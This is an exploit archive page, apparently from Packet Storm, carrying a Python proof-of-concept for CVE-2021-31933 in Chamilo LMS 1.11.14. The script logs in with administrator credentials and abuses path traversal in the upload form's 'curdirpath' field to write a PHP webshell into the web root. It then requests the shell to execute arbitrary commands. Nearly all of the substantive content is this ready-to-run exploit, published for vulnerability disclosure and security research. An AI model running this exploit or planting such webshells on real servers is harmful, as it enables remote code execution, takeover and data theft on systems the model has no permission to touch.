what you don't know can hurt you

Chamilo LMS 1.11.14 Remote Code Execution

Chamilo LMS 1.11.14 Remote Code Execution
Posted May 14, 2021
Authored by M. Cory Billington

Chamilo LMS version 1.11.14 authenticated remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2021-31933
MD5 | 5a8f8f1545cefe375862b9f2c4609083

Chamilo LMS 1.11.14 Remote Code Execution

Change Mirror Download
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase

import requests

# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/" # URL to remote host web root
user_name = "admin" # User must be an administrator
password = "admin"
command = "id;whoami"

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"

def main():
# Run a context manager with a session object to hold login session after login
with Session() as s:
login_url = f"{url}index.php"
login_data = {
"login": user_name,
"password": password
}
r = s.post(login_url, data=login_data) # login request

# Check to see if login as admin user was successful.
if "admin" not in r.url:
print(f"[-] Login as {user_name} failed. Need to be admin")
return
print(f"[+] Logged in as {user_name}")
print(f"[+] Cookie: {s.cookies}")
file_upload_url = f"{url}main/upload/upload.php"
# The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
php_webshell_file = {
"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
"user_upload": (webshell_name, content)
}

## Good command if you want to see what the request looks like without sending
# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

# Two requests required to actually upload the file
for i in range(2):
s.post(file_upload_url, files=php_webshell_file)

exploit_request_url = f"{url}{webshell_path}{webshell_name}"
print("[+] Upload complete!")
print(f"[+] Webshell: {exploit_request_url}")

# This is a GET request to the new webshell to trigger code execution
command_output = s.get(exploit_request_url)
print("[+] Command output:\n")
print(command_output.text)



if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close